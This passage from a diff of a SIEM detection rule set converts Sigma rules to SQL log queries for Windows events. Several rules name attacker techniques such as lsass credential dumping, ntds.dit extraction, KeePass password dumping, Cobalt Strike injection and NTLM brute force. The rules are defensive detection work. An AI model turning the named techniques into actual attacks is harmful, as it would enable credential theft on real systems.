LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_remote_utilities.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "status": "experimental", - "description": "Detects registry keys related to 
NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Persistence Via Disk Cleanup Handler - Registry", - "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "title": "NetSupport Manager Service Install", + "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "description": "Detects NetSupport Manager service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence" ], "falsepositives": [ - "Legitimate new entry added by windows" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office 
Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" ], - "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" + "filename": "win_system_service_install_netsupport_manager.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", - "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential RDP Exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", + "status": "test", + 
"description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "tags": [ - "attack.persistence" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Bad connections or network interruptions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_rdp_potential_cve_2019_0708.yml" }, { - "title": "PUA - Sysinternal Tool Execution - Registry", - "id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", - "author": "Markus Neis", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. 
Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution" ], "falsepositives": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "registry_add_pua_sysinternals_execution_via_eula.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "title": "USB Device Plugged", + "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "description": "Detects plugged/unplugged USB devices", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence", - "attack.lateral_movement" + "attack.initial_access", + "attack.t1200" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Legitimate administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE 
(Provider_Name = 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' AND EventID IN ('2003', '2100', '2102'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_usb_device_plugged.yml" }, { - "title": "PUA - Sysinternals Tools Execution - Registry", - "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", - "status": "experimental", - "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Remote Desktop Connection to Non-Domain Host", + "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "status": "test", + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "author": "James Pemberton", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" ], - "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" + "filename": "win_susp_ntlm_rdp.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", + "title": "NTLM Brute Force", + "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "description": "Detects common NTLM brute force device names", + "author": "Jerry Shockley '@jsh0x'", "tags": [ - "attack.execution", - "attack.t1112" + "attack.credential_access", + "attack.t1110" ], "falsepositives": [ - "Unknown" + "Systems with names equal to the spoofed ones used by the brute force tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject 
LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_susp_ntlm_brute_force.yml" }, { - "title": "Sysmon Configuration Change", - "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "status": "test", - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "author": "frack113", + "title": "NTLM Logon", + "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "status": "experimental", + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Legitimate administrative action" + "Legacy hosts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8002' AND ProcessName LIKE '%' ESCAPE '\\')" ], - "filename": "sysmon_config_modification.yml" + "filename": "win_susp_ntlm_auth.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker 
tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Suspicious Digital Signature Of AppX Package", + "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "status": "experimental", + "description": "Detects execution of AppX packages with known suspicious or malicious signature", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_appxpackaging_om_sups_appx_signature.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "title": "Application Uninstalled", + "id": "570ae5ec-33dc-427c-b815-db86228ad43e", "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An application has been removed. 
Check if it is critical.", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE EventID = '27'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('11724', '1034'))" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_builtin_remove_application.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.t1219" ], "falsepositives": [ - "There are no known false positives at this time" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - 
"filename": "sysmon_process_hollowing.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "title": "MSI Installation From Suspicious Locations", + "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", + "description": "Detects MSI package installation from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative action" + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" ], 
- "filename": "sysmon_config_modification_error.yml" + "filename": "win_msi_install_from_susp_locations.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "title": "MSI Installation From Web", + "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "status": "experimental", + "description": "Detects installation of a remote msi file from web.", + "author": "Stamatis Chatzimangou", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1218", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_msi_install_from_web.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "status": "experimental", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.initial_access", + "attack.t1190" ], 
"falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Dump Ntds.dit To Suspicious Location", + "id": "94dc4390-6b7c-4784-8ffc-335334404650", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" ], - "filename": 
"create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_esent_ntdsutil_abuse_susp_location.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "title": "Ntdsutil Abuse", + "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_esent_ntdsutil_abuse.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe 
indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Suspicious Remote Thread Target", - "id": "f016c716-754a-467f-a39e-63c06f773987", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "author": "Florian Roth 